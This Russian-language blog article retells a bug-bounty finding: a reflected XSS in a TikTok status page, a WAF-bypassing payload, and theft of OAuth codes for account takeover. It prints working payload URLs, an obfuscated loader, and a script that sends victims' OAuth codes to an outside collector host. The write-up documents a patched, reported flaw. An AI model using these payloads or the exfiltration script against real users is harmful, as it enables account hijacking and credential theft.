Недавно мы рассказывали про инструменты для проведения OSINT ТикТок. В сегодняшней статье я Const и мой друг Mr.Havit поделимся своим опытом обнаружения уязвимости XSS, которая приводит к взлому аккаунтов в приложениях TikTok.
Еще по теме: Взлом сайтов с ошибкой 404 Not Found
Как взломать аккаунта TikTok с помощью уязвимости XSS
Bug Bounty — программа, которую владелец сайта или приложения проводит для привлечения сторонних специалистов к поиску уязвимостей. При участии в Bug Bounty нужно действовать этично и придерживаться установленных правил. Не забывайте, что несанкционированный взлом является незаконным и расценивается, как уголовное преступление. Ни редакция spy-soft.net, ни автор не несут ответственность за ваши незаконные действия.
Поиск уязвимости TikTok
При работе с основным приложение ТикТок, я использовал VPN. В настройках моего VPN есть опция, которая случайным образом выбирает местоположение. При работе приложения ТикТок, соединение было случайным образом установлено на Китай.
При попытке зайти на сайт https://tiktok.com/ я был перенаправлен на другую веб-страницу с сообщением Page Not Available (Данная страница недоступна в вашем регионе).
|
1 |
https://www.tiktok.com/status?status=7&link=https://go.onelink.me/bIdt/ |
Новый URL-адрес перенаправления содержит несколько параметров. Первый параметр — status, который отвечает за содержимое страницы. Второй параметр — link, который пока непонятно каким образом влияет на страницу.
Когда мы изменили значение параметра status на 1, содержимое страницы изменилось, и появилась новая кнопка. Нажатие на кнопку перенаправляет на значение параметра link. Вот тут-то и пригодится параметр link.
|
1 |
https://www.tiktok.com/status?status=1&link=https://go.onelink.me/BAuo/ |
Мы начали тестировать значение параметра link, подставляя различные распространенные XSS-нагрузки, такие как javascript:alert() и javascript://, но ничего не изменилось. Перенаправляющая ссылка по-прежнему имела значение https://go.onelink.me/BAuo/.
Через некоторое время я понял, что на самом деле мы можем контролировать путь. Это означает, что мы установили значение параметра link в https://go.onelink.me/mrhavit/, и оно было фактически встроено в HTML.
|
1 |
https://www.tiktok.com/status?status=1&link=https://go.onelink.me/mrhavit/ |
Следующим этапом была проверка, застряли ли мы внутри атрибута href или можно вырваться и задать какие-то события. Как вы уже догадались, escape был установлен неправильно, и мы смогли успешно вставить новое событие в атрибут href.
|
1 |
https://www.tiktok.com/status?status=1&link=https://go.onelink.me/mrhavit/%22%20test |
В этот момент мы поняли, что нашли хорошую зацепку для XSS, и начали копать глубже.
Взлом ТикТок
Поскольку мы находились внутри атрибута href и потенциально могли внедрить любое событие, onclick показался наиболее подходящим. Когда мы попробовали это сделать, то быстро столкнулись WAF.
|
1 |
https://www.tiktok.com/status?status=1&link=https://go.onelink.me/mrhavit/%22%20onclick=alert(1) |
Поскольку это был особый кейс и уникальная точка входа для инъекции, мы не нашли быстрого решения с помощью полезной доступной в сети нагрузки XSS и обойти WAF. Поэтому мы начали изучать, как справиться с этим WAF, и попытались обойти его, создав свою полезную нагрузку.
Обойти WAF оказалось непростой задачей. Специальные символы, такие как > и <, были закодированы должным образом, поэтому, используя некоторые трюки с кодировкой, мы успешно вставили событие onclick.
Потратив некоторое время на работу и используя наши навыки JavaScript, мы, наконец, нашли крутой обходной путь, который позволил нам успешно выполнить JavaScript.
|
1 |
https://www.tiktok.com/status?status=1&link=https://go.onelink.me/dsa\+%0A%0D%0A%0D%22%3C!%3E!%0D%0Atarget=%22_blank%22%0D%0Aonclick=%0D%0A%22%0D%0Ax=window[%27pr%27%2b%27o%27%2b%27m%27+%2b%27pt%27](%271%27)(%271%27)%0D%0Aompt,%0D%0Ax`Tiktok` |
Сообщать о XSS-уязвимости, не продемонстрировав ее влияние, — это не совсем хорошая идея. Если показать компании последствия того, что может сделать один клик, они осознают риск и, разумеется, больше заплатят за уязвимость :)
Захват аккаунта — всегда хороший пример для демонстрации влияния XSS-уязвимости. Хотя кража cookie-файлов в наши дни редкость благодаря флагу HTTPOnly, наличие достаточных знаний о цели может привести к захвату аккаунта креативными способами. Мы смогли добиться этого, используя TikTok OAuth.
Большинство сервисов TikTok предлагают Login With TikTok (Войти с помощью ТикТок) в качестве опции для входа. В этой статье мы сосредоточимся на ads.tiktok.com, но эта уязвимость также затрагивает и другие сервисы.
|
1 |
https://ads.tiktok.com/i18n/login/?_source_=ads_homepage&lang=en®ion=0 |
После нажатия на кнопку Login With TikTok отобразилась следующая страница:
|
1 |
https://www.tiktok.com/auth/authorize?client_key=aw8cb3204x0a1g88&response_type=code&scope=user.info.basic%2Cuser.info.email%2Cuser.info.phone%2Cuser.info.showcase%2Cvideo.list.no_watermark%2Cvideo.list.private_ads.no_watermark%2Cuser.account.configure%2Cvideo.list.manage%2Clive.list%2Ccomment.list%2Ccomment.list.manage&version=1&lang=en&state=b5d324d197693fd0ab0f5bde42020d3f91feb5bb&redirect_uri=https%3A%2F%2Fads.tiktok.com%2Fi18n%2Flogin%2F%3F_extra%3DcGxhdGZvcm09dGlrdG9rJmxvZ2luX2FjdGlvbj1yZWRpcmVjdCZzaG93X2JpbmRfZXJyb3I9dHJ1ZSZzaG93X2xvZ291dD10cnVlJm9yaWdpbj1odHRwczovL2Fkcy50aWt0b2suY29tL2kxOG4vbG9naW4vJnVzZXJfc2V0dGluZ19zdGF0dXM9dHJ1ZSZyZWRpcmVjdD1odHRwcyUzQSUyRiUyRmFkcy50aWt0b2suY29tJTJGaTE4biUyRmhvbWUlMkYmZnJvbV9wYWdlPWxvZ2lu%26state%3Db5d324d197693fd0ab0f5bde42020d3f91feb5bb&error_uri=https%3A%2F%2Fads.tiktok.com%2Fi18n%2Flogin%2F%3F_extra%3DcGxhdGZvcm09dGlrdG9rJmxvZ2luX2FjdGlvbj1yZWRpcmVjdCZzaG93X2JpbmRfZXJyb3I9dHJ1ZSZzaG93X2xvZ291dD10cnVlJm9yaWdpbj1odHRwczovL2Fkcy50aWt0b2suY29tL2kxOG4vbG9naW4vJnVzZXJfc2V0dGluZ19zdGF0dXM9dHJ1ZSZyZWRpcmVjdD1odHRwcyUzQSUyRiUyRmFkcy50aWt0b2suY29tJTJGaTE4biUyRmhvbWUlMkYmZnJvbV9wYWdlPWxvZ2lu%26state%3Db5d324d197693fd0ab0f5bde42020d3f91feb5bb |
Эта страница размещена на хостинге www.tiktok.com, на котором и находится наша XSS-уязвимость. После нажатия на кнопку Authorize (Авторизация) был сформирован следующий запрос:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 |
POST /passport/open/web/auth/?client_key=aw8cb3204x0a1g88&scope=user.info.basic%2Cuser.info.phone%2Cuser.account.configure%2Ccomment.list.manage%2Cuser.info.showcase%2Clive.list%2Ccomment.list%2Cvideo.list.private_ads.no_watermark%2Cvideo.list.manage%2Cuser.info.email%2Cvideo.list.no_watermark&aid=1459&source=web&redirect_uri=https%3A%2F%2Fads.tiktok.com%2Fi18n%2Flogin%2F%3F_extra%3DcGxhdGZvcm09dGlrdG9rJmxvZ2luX2FjdGlvbj1yZWRpcmVjdCZzaG93X2JpbmRfZXJyb3I9dHJ1ZSZzaG93X2xvZ291dD10cnVlJm9yaWdpbj1odHRwczovL2Fkcy50aWt0b2suY29tL2kxOG4vbG9naW4vJnVzZXJfc2V0dGluZ19zdGF0dXM9dHJ1ZSZyZWRpcmVjdD1odHRwcyUzQSUyRiUyRmFkcy50aWt0b2suY29tJTJGaTE4biUyRmhvbWUlMkYmZnJvbV9wYWdlPWxvZ2lu%26state%3Db5d324d197693fd0ab0f5bde42020d3f91feb5bb&state=b5d324d197693fd0ab0f5bde42020d3f91feb5bb HTTP/2 Host: www.tiktok.com Cookie: ............. Content-Length: 2 Sec-Ch-Ua: "Google Chrome";v="113", "Chromium";v="113", "Not-A.Brand";v="24" Accept: application/json, text/plain, */* Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 Origin: https://www.tiktok.com Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://www.tiktok.com/auth/authorize?client_key=aw8cb3204x0a1g88&response_type=code&scope=user.info.basic%2Cuser.info.email%2Cuser.info.phone%2Cuser.info.showcase%2Cvideo.list.no_watermark%2Cvideo.list.private_ads.no_watermark%2Cuser.account.configure%2Cvideo.list.manage%2Clive.list%2Ccomment.list%2Ccomment.list.manage&version=1&lang=en&state=b5d324d197693fd0ab0f5bde42020d3f91feb5bb&redirect_uri=https%3A%2F%2Fads.tiktok.com%2Fi18n%2Flogin%2F%3F_extra%3DcGxhdGZvcm09dGlrdG9rJmxvZ2luX2FjdGlvbj1yZWRpcmVjdCZzaG93X2JpbmRfZXJyb3I9dHJ1ZSZzaG93X2xvZ291dD10cnVlJm9yaWdpbj1odHRwczovL2Fkcy50aWt0b2suY29tL2kxOG4vbG9naW4vJnVzZXJfc2V0dGluZ19zdGF0dXM9dHJ1ZSZyZWRpcmVjdD1odHRwcyUzQSUyRiUyRmFkcy50aWt0b2suY29tJTJGaTE4biUyRmhvbWUlMkYmZnJvbV9wYWdlPWxvZ2lu%26state%3Db5d324d197693fd0ab0f5bde42020d3f91feb5bb&error_uri=https%3A%2F%2Fads.tiktok.com%2Fi18n%2Flogin%2F%3F_extra%3DcGxhdGZvcm09dGlrdG9rJmxvZ2luX2FjdGlvbj1yZWRpcmVjdCZzaG93X2JpbmRfZXJyb3I9dHJ1ZSZzaG93X2xvZ291dD10cnVlJm9yaWdpbj1odHRwczovL2Fkcy50aWt0b2suY29tL2kxOG4vbG9naW4vJnVzZXJfc2V0dGluZ19zdGF0dXM9dHJ1ZSZyZWRpcmVjdD1odHRwcyUzQSUyRiUyRmFkcy50aWt0b2suY29tJTJGaTE4biUyRmhvbWUlMkYmZnJvbV9wYWdlPWxvZ2lu%26state%3Db5d324d197693fd0ab0f5bde42020d3f91feb5bb Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 {} |
В ответе содержится нечто очень интересное — code для аутентификации OAuth.
Если объединить это с нашей XSS-уязвимостью, то можно было бы одним кликом слить code OAuth нашей жертве. Хотя ТикТик не видел свидетельств использования этой уязвимости до ее устранения, злоумышленники, получившие эти коды, могли использовать их для захвата аккаунтов своих жертв.
Скрипт JS для обхода WAF
Мы создали полезную нагрузку JS, которая обходила WAF и загружала новый скрипт с сервера злоумышленника. В нашем случае скрипт был загружен с сервера:
|
1 |
http://127.0.0.1:5500/asd.js |
Файл asd.js содержит JavaScript-код, который отправляет XHR POST-запрос к конечной точке OAuth и отсылает ответ на сервер, контролируемый злоумышленником.
|
1 2 3 4 5 6 7 8 9 10 |
var xhr = new XMLHttpRequest(); xhr.onload = reqListener; xhr.open("POST", "https://www.tiktok.com/passport/open/web/auth/?client_key=aw8cb3204x0a1g88&scope=user.info.basic%2Cuser.info.phone%2Cvideo.list.manage%2Ccomment.list%2Clive.list%2Cvideo.list.private_ads.no_watermark%2Cuser.account.configure%2Cuser.info.showcase%2Cuser.info.email%2Cvideo.list.no_watermark%2Ccomment.list.manage&aid=1459&source=web&redirect_uri=https%3a%2f%2fads.tiktok.com%2fblablablabla&state=64588d019065e001fa8e7abdd884581c10770400"); xhr.withCredentials = true; xhr.setRequestHeader("Content-Type", "application/json"); xhr.send(); function reqListener() { location='//rqlu5n70d1zgnxxbz3xzlq09b0hr5ntc.oastify.com/log?key='+this.responseText; }; |
В ответе содержался code OAuth пользователя жертвы, который мог быть использован злоумышленником для получения доступа к учетной записи жертвы.
В следующем видео мы демонстрируем, как жертва могла нажать на XSS, а code OAuth был отправлен обратно на контролируемый злоумышленником сервер.
|
1 |
https://www.tiktok.com/status?status=1&link=https://go.onelink.me/dsa\+%0A%0D%0A%0D%22%3C!%3E!%0D%0Atarget=%22_blank%22%0D%0Aonclick=%0D%0A%22%0D%0Ax=window[%27ev%27%2b%27a%27%2b%27l%27]((%27fe%27+%2b+%27tch%27+%2b+%27(%27+%2b+%27\%27ht%27+%2b+%27tp%27+%2b+%27%3a//%27+%2b+%27lo%27+%2b+%27ca%27+%2b+%27lho%27+%2b+%27st%27+%2b+%27%3a%27+%2b+%2755%27+%2b+%2700%27+%2b+%27/%27+%2b+%27as%27+%2b+%27d.%27+%2b+%27js\%27%27+%2b+%27)%27+%2b+%27.%27+%2b+%27the%27+%2b+%27n(%27+%2b+%27re%27+%2b+%27sp%27+%2b+%27on%27+%2b+%27se%27+%2b+%27%3d%3E%27+%2b+%27re%27+%2b+%27sp%27+%2b+%27on%27+%2b+%27se.%27+%2b+%27te%27+%2b+%27xt()%27+%2b+%27.%27+%2b+%27the%27+%2b+%27n(%27+%2b+%27te%27+%2b+%27xt%27+%2b+%27%3d%3E%27+%2b+%27ev%27+%2b+%27al%27+%2b+%27(%27+%2b+%27te%27+%2b+%27xt%27+%2b+%27)%27+%2b+%27)%27+%2b+%27)%27)) |
Отчет о взломе на HackerOne
Хронология:
- Мы сообщили — 23 марта
- Рассмотрено — 3 апреля
- Мы получили денежное награждение — 6 апреля
- TikTok устранил уязвимость — 6 апреля
Заключение
10 апреля мы сообщили, что XSS-уязвимость все еще присутствует в нашем регионе. Команда ТикТок провела расследование и подтвердила, что в некоторых регионах существовала внутренняя проблема с сервисом, из-за которой XSS все еще мог срабатывать. Позже, в ходе работы с командой TikTok они подтвердили, что уязвимость была окончательно исправлена.
ПОЛЕЗНЫЕ ССЫЛКИ:
- Вот как взломал сайт Tesla и получил 10.000$
- Взлом аккаунта мессенджера с помощью Burp Suite
- Вот как я нашел уязвимость Reflected XSS на сайте NASA
Мой аккаунт взломали
Это моя аккаунт похитил его нужна помощь, чтобы вернуться